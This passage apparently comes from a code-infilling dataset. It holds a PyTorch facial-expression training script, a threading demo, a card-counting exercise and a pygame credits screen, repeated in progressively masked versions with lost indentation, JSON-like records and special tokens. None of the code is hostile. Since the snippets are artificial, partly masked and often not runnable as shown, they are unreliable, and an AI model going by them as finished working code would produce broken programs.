pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))
loss = criterion(pred, label.to(device))
loss.backward()
optimizer.step()
Softmax = torch.nn.Softmax(dim=1)
_, prediction_tr = torch.max(Softmax(pred), 1)
y_true_tr = label.cpu().detach().numpy()
y_pred_tr = prediction_tr.cpu().detach().numpy()
acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss * image.size(0)
running_acc += acc_tr * image.size(0)
train_loss = running_loss / len(train_dataset)
train_acc = running_acc / len(train_dataset)
print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))
running_loss = 0
running_acc = 0
model.eval()
with torch.no_grad():
for image, label in valid_dataloader:
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(1, 2).to(
device))
loss = criterion(pred, label.to(device))
Softmax = torch.nn.Softmax(dim=1)
_, prediction = torch.max(Softmax(pred), 1)
y_true = label.cpu().detach().numpy()
y_pred = prediction.cpu().detach().numpy()
acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss.item() * image.size(0)
running_acc += acc_tr * image.size(0)
valid_loss = running_loss / len(valid_dataset)
valid_acc = running_acc / len(valid_dataset)
print('>>> Valid loss : %.4f - Valid acc : %.4f\n' % (valid_loss,
valid_acc))
print(prediction)
print(label)
print()
if (epoch + 1) % 5 == 0:
save_path = os.path.join('.', 'save_')
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(model, os.path.join(save_path,
'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,
valid_acc)))
<|reserved_special_token_1|>
import os
import torch
from data_loader import FER
from torch.utils.data import DataLoader
from tqdm import tqdm
import model as md
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
lr = 1e-05
epochs = 500
batch_size = 2
train_data_path = '../../../data/face_data'
train_dataset = FER(train_data_path, image_size=64, mode='train')
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle
=True)
valid_data_path = '../../../data/face_data'
valid_dataset = FER(valid_data_path, image_size=64, mode='val')
valid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle
=False)
model = md.vgg16_bn(num_classes=3).to(device)
model.to(device)
criterion = torch.nn.CrossEntropyLoss().to(device)
optimizer = torch.optim.Adam(params=model.parameters(), lr=lr)
...
for epoch in range(epochs):
running_loss = 0
running_acc = 0
train_loss = 0
model.train()
for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (
epoch + 1, epochs)):
optimizer.zero_grad()
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))
loss = criterion(pred, label.to(device))
loss.backward()
optimizer.step()
Softmax = torch.nn.Softmax(dim=1)
_, prediction_tr = torch.max(Softmax(pred), 1)
y_true_tr = label.cpu().detach().numpy()
y_pred_tr = prediction_tr.cpu().detach().numpy()
acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss * image.size(0)
running_acc += acc_tr * image.size(0)
train_loss = running_loss / len(train_dataset)
train_acc = running_acc / len(train_dataset)
print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))
running_loss = 0
running_acc = 0
model.eval()
with torch.no_grad():
for image, label in valid_dataloader:
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(1, 2).to(
device))
loss = criterion(pred, label.to(device))
Softmax = torch.nn.Softmax(dim=1)
_, prediction = torch.max(Softmax(pred), 1)
y_true = label.cpu().detach().numpy()
y_pred = prediction.cpu().detach().numpy()
acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss.item() * image.size(0)
running_acc += acc_tr * image.size(0)
valid_loss = running_loss / len(valid_dataset)
valid_acc = running_acc / len(valid_dataset)
print('>>> Valid loss : %.4f - Valid acc : %.4f\n' % (valid_loss,
valid_acc))
print(prediction)
print(label)
print()
if (epoch + 1) % 5 == 0:
save_path = os.path.join('.', 'save_')
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(model, os.path.join(save_path,
'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,
valid_acc)))
<|reserved_special_token_1|>
import os
import torch
from data_loader import FER
from torch.utils.data import DataLoader
from tqdm import tqdm
# from tensorboardX import SummaryWriter
import model as md
# train_writer = SummaryWriter(log_dir="log_last_last_last/train")
# valid_writer = SummaryWriter(log_dir="log_last_last_last/valid")
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
# os.environ["CUDA_VISIBLE_DEVICES"] = "2"
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Hyper-parameters
lr = 1e-5
epochs = 500
batch_size = 2
train_data_path = '../../../data/face_data'
train_dataset = FER(train_data_path , image_size=64, mode='train')
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle = True)
valid_data_path = '../../../data/face_data'
valid_dataset = FER(valid_data_path,image_size=64, mode='val')
valid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle = False)
model = md.vgg16_bn(num_classes = 3).to(device)
# model_name = 'vgg16'
# feature_extract = True
# num_classes = 3
# model = md.init_pretrained_models(model_name, num_classes, feature_extract, use_pretrained=True)
model.to(device)
criterion = torch.nn.CrossEntropyLoss().to(device)
optimizer = torch.optim.Adam(params = model.parameters(), lr = lr)
...
for epoch in range(epochs):
running_loss = 0
running_acc = 0
train_loss = 0
model.train()
# ================== Training ==================
for image, label in tqdm(train_dataloader, desc="Epoch [%d/%d]" % (epoch + 1, epochs)):
optimizer.zero_grad() # Optimizer를 0으로 초기화
image = image / 255.
pred = model(image.float().transpose(3,2).transpose(2,1).to(device))
loss = criterion(pred, label.to(device))
loss.backward()
optimizer.step()
Softmax = torch.nn.Softmax(dim=1)
_, prediction_tr = torch.max(Softmax(pred), 1)
y_true_tr = label.cpu().detach().numpy()
y_pred_tr = prediction_tr.cpu().detach().numpy()
# acc = confusion_matrix(y_true, y_pred)
acc_tr = ((label == prediction_tr.cpu()).sum().item() / pred.shape[0]) * 100
# running_loss += loss.item()
running_loss += loss * image.size(0)
running_acc += acc_tr * image.size(0)
train_loss = running_loss / len(train_dataset)
train_acc = running_acc / len(train_dataset)
# loss_sum = tf.summary.scalar("train_loss", train_loss)
# acc_sum = tf.summary.scalar("train_accuracy", train_acc)
# writer = tf.summary.FileWriter("./abc")
# summary, _ = sess.run([loss_sum, epochs], feed_dict={x: loss_sum, y: epochs})
print('>>> Train loss : %.4f - Train acc : %.4f'% (train_loss, train_acc))
# train_acc = running_acc / len(train_dataloader)
# =================== Validation ===================
running_loss = 0
running_acc = 0
model.eval()
# model.load_state_dict(torch.load('filenname'))
with torch.no_grad():
# val_st ep = 0
for image, label in valid_dataloader:
image = image / 255.
pred = model(image.float().transpose(3,2).transpose(1,2).to(device))
loss = criterion(pred, label.to(device))
Softmax = torch.nn.Softmax(dim=1)
_, prediction = torch.max(Softmax(pred), 1)
y_true = label.cpu().detach().numpy()
y_pred = prediction.cpu().detach().numpy()
# acc = confusion_matrix(y_true, y_pred)
acc_tr = ((label == prediction.cpu()).sum().item() / pred.shape[0]) * 100
# running_acc += acc_tr
# running_loss += loss.item()
# val_step +=1
running_loss += loss.item() * image.size(0)
running_acc += acc_tr * image.size(0)
valid_loss = running_loss / len(valid_dataset)
valid_acc = running_acc / len(valid_dataset)
print(">>> Valid loss : %.4f - Valid acc : %.4f\n" % (valid_loss, valid_acc))
print(prediction)
print(label)
print()
# train_writer.add_scalar('loss', train_loss, epoch)
# train_writer.add_scalar('accuracy', train_acc, epoch)
# valid_writer.add_scalar('loss', valid_loss, epoch)
# valid_writer.add_scalar('accuracy', valid_acc, epoch)
if (epoch+1) % 5 == 0 :
save_path = os.path.join('.', 'save_')
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(model, os.path.join(save_path, 'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt'%(epoch, valid_loss, valid_acc)))
|
flexible
|
{
"blob_id": "c3aee5d822d48c9dc826f8f2f8d4a56e11513b9c",
"index": 2882,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nmodel.to(device)\n<mask token>\n...\nfor epoch in range(epochs):\n running_loss = 0\n running_acc = 0\n train_loss = 0\n model.train()\n for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (\n epoch + 1, epochs)):\n optimizer.zero_grad()\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))\n loss = criterion(pred, label.to(device))\n loss.backward()\n optimizer.step()\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction_tr = torch.max(Softmax(pred), 1)\n y_true_tr = label.cpu().detach().numpy()\n y_pred_tr = prediction_tr.cpu().detach().numpy()\n acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss * image.size(0)\n running_acc += acc_tr * image.size(0)\n train_loss = running_loss / len(train_dataset)\n train_acc = running_acc / len(train_dataset)\n print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))\n running_loss = 0\n running_acc = 0\n model.eval()\n with torch.no_grad():\n for image, label in valid_dataloader:\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(1, 2).to(\n device))\n loss = criterion(pred, label.to(device))\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction = torch.max(Softmax(pred), 1)\n y_true = label.cpu().detach().numpy()\n y_pred = prediction.cpu().detach().numpy()\n acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss.item() * image.size(0)\n running_acc += acc_tr * image.size(0)\n valid_loss = running_loss / len(valid_dataset)\n valid_acc = running_acc / len(valid_dataset)\n print('>>> Valid loss : %.4f - Valid acc : %.4f\\n' % (valid_loss,\n valid_acc))\n print(prediction)\n print(label)\n print()\n if (epoch + 1) % 5 == 0:\n save_path = os.path.join('.', 'save_')\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n torch.save(model, os.path.join(save_path, \n 'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,\n valid_acc)))\n",
"step-3": "<mask token>\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nlr = 1e-05\nepochs = 500\nbatch_size = 2\ntrain_data_path = '../../../data/face_data'\ntrain_dataset = FER(train_data_path, image_size=64, mode='train')\ntrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle\n =True)\nvalid_data_path = '../../../data/face_data'\nvalid_dataset = FER(valid_data_path, image_size=64, mode='val')\nvalid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle\n =False)\nmodel = md.vgg16_bn(num_classes=3).to(device)\nmodel.to(device)\ncriterion = torch.nn.CrossEntropyLoss().to(device)\noptimizer = torch.optim.Adam(params=model.parameters(), lr=lr)\n...\nfor epoch in range(epochs):\n running_loss = 0\n running_acc = 0\n train_loss = 0\n model.train()\n for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (\n epoch + 1, epochs)):\n optimizer.zero_grad()\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))\n loss = criterion(pred, label.to(device))\n loss.backward()\n optimizer.step()\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction_tr = torch.max(Softmax(pred), 1)\n y_true_tr = label.cpu().detach().numpy()\n y_pred_tr = prediction_tr.cpu().detach().numpy()\n acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss * image.size(0)\n running_acc += acc_tr * image.size(0)\n train_loss = running_loss / len(train_dataset)\n train_acc = running_acc / len(train_dataset)\n print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))\n running_loss = 0\n running_acc = 0\n model.eval()\n with torch.no_grad():\n for image, label in valid_dataloader:\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(1, 2).to(\n device))\n loss = criterion(pred, label.to(device))\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction = torch.max(Softmax(pred), 1)\n y_true = label.cpu().detach().numpy()\n y_pred = prediction.cpu().detach().numpy()\n acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss.item() * image.size(0)\n running_acc += acc_tr * image.size(0)\n valid_loss = running_loss / len(valid_dataset)\n valid_acc = running_acc / len(valid_dataset)\n print('>>> Valid loss : %.4f - Valid acc : %.4f\\n' % (valid_loss,\n valid_acc))\n print(prediction)\n print(label)\n print()\n if (epoch + 1) % 5 == 0:\n save_path = os.path.join('.', 'save_')\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n torch.save(model, os.path.join(save_path, \n 'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,\n valid_acc)))\n",
"step-4": "import os\nimport torch\nfrom data_loader import FER\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport model as md\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nlr = 1e-05\nepochs = 500\nbatch_size = 2\ntrain_data_path = '../../../data/face_data'\ntrain_dataset = FER(train_data_path, image_size=64, mode='train')\ntrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle\n =True)\nvalid_data_path = '../../../data/face_data'\nvalid_dataset = FER(valid_data_path, image_size=64, mode='val')\nvalid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle\n =False)\nmodel = md.vgg16_bn(num_classes=3).to(device)\nmodel.to(device)\ncriterion = torch.nn.CrossEntropyLoss().to(device)\noptimizer = torch.optim.Adam(params=model.parameters(), lr=lr)\n...\nfor epoch in range(epochs):\n running_loss = 0\n running_acc = 0\n train_loss = 0\n model.train()\n for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (\n epoch + 1, epochs)):\n optimizer.zero_grad()\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))\n loss = criterion(pred, label.to(device))\n loss.backward()\n optimizer.step()\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction_tr = torch.max(Softmax(pred), 1)\n y_true_tr = label.cpu().detach().numpy()\n y_pred_tr = prediction_tr.cpu().detach().numpy()\n acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss * image.size(0)\n running_acc += acc_tr * image.size(0)\n train_loss = running_loss / len(train_dataset)\n train_acc = running_acc / len(train_dataset)\n print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))\n running_loss = 0\n running_acc = 0\n model.eval()\n with torch.no_grad():\n for image, label in valid_dataloader:\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(1, 2).to(\n device))\n loss = criterion(pred, label.to(device))\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction = torch.max(Softmax(pred), 1)\n y_true = label.cpu().detach().numpy()\n y_pred = prediction.cpu().detach().numpy()\n acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss.item() * image.size(0)\n running_acc += acc_tr * image.size(0)\n valid_loss = running_loss / len(valid_dataset)\n valid_acc = running_acc / len(valid_dataset)\n print('>>> Valid loss : %.4f - Valid acc : %.4f\\n' % (valid_loss,\n valid_acc))\n print(prediction)\n print(label)\n print()\n if (epoch + 1) % 5 == 0:\n save_path = os.path.join('.', 'save_')\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n torch.save(model, os.path.join(save_path, \n 'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,\n valid_acc)))\n",
"step-5": "import os\r\nimport torch\r\nfrom data_loader import FER\r\nfrom torch.utils.data import DataLoader\r\nfrom tqdm import tqdm\r\n# from tensorboardX import SummaryWriter\r\nimport model as md\r\n\r\n\r\n\r\n# train_writer = SummaryWriter(log_dir=\"log_last_last_last/train\")\r\n# valid_writer = SummaryWriter(log_dir=\"log_last_last_last/valid\")\r\n\r\n# os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n# Hyper-parameters\r\nlr = 1e-5\r\nepochs = 500\r\nbatch_size = 2\r\n\r\ntrain_data_path = '../../../data/face_data'\r\ntrain_dataset = FER(train_data_path , image_size=64, mode='train')\r\ntrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle = True)\r\n\r\nvalid_data_path = '../../../data/face_data'\r\nvalid_dataset = FER(valid_data_path,image_size=64, mode='val')\r\nvalid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle = False)\r\n\r\n\r\nmodel = md.vgg16_bn(num_classes = 3).to(device)\r\n\r\n\r\n\r\n# model_name = 'vgg16'\r\n# feature_extract = True\r\n# num_classes = 3\r\n# model = md.init_pretrained_models(model_name, num_classes, feature_extract, use_pretrained=True)\r\n\r\n\r\nmodel.to(device)\r\ncriterion = torch.nn.CrossEntropyLoss().to(device)\r\noptimizer = torch.optim.Adam(params = model.parameters(), lr = lr)\r\n\r\n...\r\nfor epoch in range(epochs):\r\n running_loss = 0\r\n running_acc = 0\r\n train_loss = 0\r\n model.train()\r\n\r\n # ================== Training ==================\r\n for image, label in tqdm(train_dataloader, desc=\"Epoch [%d/%d]\" % (epoch + 1, epochs)):\r\n optimizer.zero_grad() # Optimizer를 0으로 초기화\r\n image = image / 255.\r\n pred = model(image.float().transpose(3,2).transpose(2,1).to(device))\r\n loss = criterion(pred, label.to(device))\r\n\r\n loss.backward()\r\n optimizer.step()\r\n\r\n Softmax = torch.nn.Softmax(dim=1)\r\n _, prediction_tr = torch.max(Softmax(pred), 1)\r\n\r\n y_true_tr = label.cpu().detach().numpy()\r\n y_pred_tr = prediction_tr.cpu().detach().numpy()\r\n # acc = confusion_matrix(y_true, y_pred)\r\n\r\n acc_tr = ((label == prediction_tr.cpu()).sum().item() / pred.shape[0]) * 100\r\n\r\n\r\n # running_loss += loss.item()\r\n running_loss += loss * image.size(0)\r\n running_acc += acc_tr * image.size(0)\r\n\r\n train_loss = running_loss / len(train_dataset)\r\n train_acc = running_acc / len(train_dataset)\r\n\r\n # loss_sum = tf.summary.scalar(\"train_loss\", train_loss)\r\n # acc_sum = tf.summary.scalar(\"train_accuracy\", train_acc)\r\n\r\n\r\n # writer = tf.summary.FileWriter(\"./abc\")\r\n\r\n # summary, _ = sess.run([loss_sum, epochs], feed_dict={x: loss_sum, y: epochs})\r\n\r\n\r\n print('>>> Train loss : %.4f - Train acc : %.4f'% (train_loss, train_acc))\r\n # train_acc = running_acc / len(train_dataloader)\r\n\r\n\r\n # =================== Validation ===================\r\n running_loss = 0\r\n running_acc = 0\r\n model.eval()\r\n # model.load_state_dict(torch.load('filenname'))\r\n\r\n\r\n\r\n with torch.no_grad():\r\n # val_st ep = 0\r\n for image, label in valid_dataloader:\r\n image = image / 255.\r\n\r\n pred = model(image.float().transpose(3,2).transpose(1,2).to(device))\r\n loss = criterion(pred, label.to(device))\r\n\r\n\r\n Softmax = torch.nn.Softmax(dim=1)\r\n _, prediction = torch.max(Softmax(pred), 1)\r\n\r\n y_true = label.cpu().detach().numpy()\r\n y_pred = prediction.cpu().detach().numpy()\r\n # acc = confusion_matrix(y_true, 
y_pred)\r\n acc_tr = ((label == prediction.cpu()).sum().item() / pred.shape[0]) * 100\r\n # running_acc += acc_tr\r\n\r\n # running_loss += loss.item()\r\n # val_step +=1\r\n running_loss += loss.item() * image.size(0)\r\n running_acc += acc_tr * image.size(0)\r\n\r\n valid_loss = running_loss / len(valid_dataset)\r\n valid_acc = running_acc / len(valid_dataset)\r\n\r\n print(\">>> Valid loss : %.4f - Valid acc : %.4f\\n\" % (valid_loss, valid_acc))\r\n print(prediction)\r\n print(label)\r\n print()\r\n\r\n # train_writer.add_scalar('loss', train_loss, epoch)\r\n # train_writer.add_scalar('accuracy', train_acc, epoch)\r\n # valid_writer.add_scalar('loss', valid_loss, epoch)\r\n # valid_writer.add_scalar('accuracy', valid_acc, epoch)\r\n\r\n if (epoch+1) % 5 == 0 :\r\n save_path = os.path.join('.', 'save_')\r\n if not os.path.exists(save_path):\r\n os.makedirs(save_path)\r\n torch.save(model, os.path.join(save_path, 'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt'%(epoch, valid_loss, valid_acc)))\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def sleeping():
time.sleep(5)
print('Ended')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def sleeping():
time.sleep(5)
print('Ended')
Thread(target=sleeping, daemon=True).start()
print('Hello world')
time.sleep(5.5)
<|reserved_special_token_1|>
from threading import Thread
import time
def sleeping():
time.sleep(5)
print('Ended')
Thread(target=sleeping, daemon=True).start()
print('Hello world')
time.sleep(5.5)
|
flexible
|
{
"blob_id": "628fdf848079d0ecf5bf4f5bd46e07ad6cd10358",
"index": 5070,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef sleeping():\n time.sleep(5)\n print('Ended')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef sleeping():\n time.sleep(5)\n print('Ended')\n\n\nThread(target=sleeping, daemon=True).start()\nprint('Hello world')\ntime.sleep(5.5)\n",
"step-4": "from threading import Thread\nimport time\n\n\ndef sleeping():\n time.sleep(5)\n print('Ended')\n\n\nThread(target=sleeping, daemon=True).start()\nprint('Hello world')\ntime.sleep(5.5)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
T = int(input())
for cnt in range(1, T + 1):
S = input()
S_list = []
card = {'S': 13, 'D': 13, 'H': 13, 'C': 13}
print('#' + str(cnt), end=' ')
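    # split the input into 3-character card codes (suit letter + 2-digit number)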
for i in range(0, len(S), 3):
S_list.append(S[i:i + 3])
if len(set(S_list)) != len(S_list):
print('ERROR')
else:
for i in S_list:
card[i[0]] -= 1
print(*card.values())
|
normal
|
{
"blob_id": "45750152313fd3670867c61d0173e4cb11a806ba",
"index": 4468,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor cnt in range(1, T + 1):\n S = input()\n S_list = []\n card = {'S': 13, 'D': 13, 'H': 13, 'C': 13}\n print('#' + str(cnt), end=' ')\n for i in range(0, len(S), 3):\n S_list.append(S[i:i + 3])\n if len(set(S_list)) != len(S_list):\n print('ERROR')\n else:\n for i in S_list:\n card[i[0]] -= 1\n print(*card.values())\n",
"step-3": "T = int(input())\nfor cnt in range(1, T + 1):\n S = input()\n S_list = []\n card = {'S': 13, 'D': 13, 'H': 13, 'C': 13}\n print('#' + str(cnt), end=' ')\n for i in range(0, len(S), 3):\n S_list.append(S[i:i + 3])\n if len(set(S_list)) != len(S_list):\n print('ERROR')\n else:\n for i in S_list:\n card[i[0]] -= 1\n print(*card.values())\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from . import find_resault
from . import sql
|
flexible
|
{
"blob_id": "6f05d1915cd2e123dd72233b59d4de43fd724035",
"index": 7743,
"step-1": "<mask token>\n",
"step-2": "from . import find_resault\nfrom . import sql\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
def draw_text(surf, text, size, x, y):
font_name = pygame.font.match_font('OCR A Extended')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = x, y
surf.blit(text_surface, text_rect)
def button(msg, x, y, w, h, ic, ac, action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
print(click)
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(screen, ac, (x, y, w, h))
if click[0] == 1 and action != None:
if action == quit:
pygame.quit()
quit()
else:
pygame.draw.rect(screen, ic, (x, y, w, h))
def main():
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((1000, 800))
pygame.display.set_caption('Credits')
background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')
).convert_alpha()
clock = pygame.time.Clock()
start_ticks = pygame.time.get_ticks()
screen.blit(background, (0, 0))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
quit()
screen.blit(background, (0, 0))
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'Credits', 60, 500, 100)
draw_text(screen, 'Vincent', 30, 500, 250)
draw_text(screen, 'Chevery', 30, 500, 330)
draw_text(screen, 'Charlie', 30, 500, 410)
draw_text(screen, 'Julian', 30, 500, 490)
draw_text(screen, 'Sheriyar', 30, 500, 570)
draw_text(screen, 'Julian', 30, 500, 650)
mouse = pygame.mouse.get_pos()
if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:
pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))
else:
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'EXIT', 40, 488, 660)
button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)
pygame.display.flip()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def draw_text(surf, text, size, x, y):
font_name = pygame.font.match_font('OCR A Extended')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = x, y
surf.blit(text_surface, text_rect)
def button(msg, x, y, w, h, ic, ac, action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
print(click)
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(screen, ac, (x, y, w, h))
if click[0] == 1 and action != None:
if action == quit:
pygame.quit()
quit()
else:
pygame.draw.rect(screen, ic, (x, y, w, h))
def main():
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((1000, 800))
pygame.display.set_caption('Credits')
background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')
).convert_alpha()
clock = pygame.time.Clock()
start_ticks = pygame.time.get_ticks()
screen.blit(background, (0, 0))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
quit()
screen.blit(background, (0, 0))
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'Credits', 60, 500, 100)
draw_text(screen, 'Vincent', 30, 500, 250)
draw_text(screen, 'Chevery', 30, 500, 330)
draw_text(screen, 'Charlie', 30, 500, 410)
draw_text(screen, 'Julian', 30, 500, 490)
draw_text(screen, 'Sheriyar', 30, 500, 570)
draw_text(screen, 'Julian', 30, 500, 650)
mouse = pygame.mouse.get_pos()
if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:
pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))
else:
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'EXIT', 40, 488, 660)
button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)
pygame.display.flip()
if __name__ == '__main__':
main()
pygame.quit()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
WIDTH = 1000
HEIGHT = 800
FPS = 60
BLACK = 0, 0, 0
WHITE = 255, 255, 255
RED = 255, 0, 0
GREEN = 0, 255, 0
BLUE = 0, 0, 255
YELLOW = 255, 255, 0
GRAY80 = 204, 204, 204
GRAY = 26, 26, 26
screen = pygame.display.set_mode((1000, 800))
game_folder = os.path.dirname(__file__)
img_folder = os.path.join(game_folder, 'img')
def draw_text(surf, text, size, x, y):
font_name = pygame.font.match_font('OCR A Extended')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = x, y
surf.blit(text_surface, text_rect)
def button(msg, x, y, w, h, ic, ac, action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
print(click)
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(screen, ac, (x, y, w, h))
if click[0] == 1 and action != None:
if action == quit:
pygame.quit()
quit()
else:
pygame.draw.rect(screen, ic, (x, y, w, h))
def main():
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((1000, 800))
pygame.display.set_caption('Credits')
background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')
).convert_alpha()
clock = pygame.time.Clock()
start_ticks = pygame.time.get_ticks()
screen.blit(background, (0, 0))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
quit()
screen.blit(background, (0, 0))
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'Credits', 60, 500, 100)
draw_text(screen, 'Vincent', 30, 500, 250)
draw_text(screen, 'Chevery', 30, 500, 330)
draw_text(screen, 'Charlie', 30, 500, 410)
draw_text(screen, 'Julian', 30, 500, 490)
draw_text(screen, 'Sheriyar', 30, 500, 570)
draw_text(screen, 'Julian', 30, 500, 650)
mouse = pygame.mouse.get_pos()
if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:
pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))
else:
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'EXIT', 40, 488, 660)
button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)
pygame.display.flip()
if __name__ == '__main__':
main()
pygame.quit()
<|reserved_special_token_1|>
import os, pygame
import sys
from os import path
from random import choice
WIDTH = 1000
HEIGHT = 800
FPS = 60
BLACK = 0, 0, 0
WHITE = 255, 255, 255
RED = 255, 0, 0
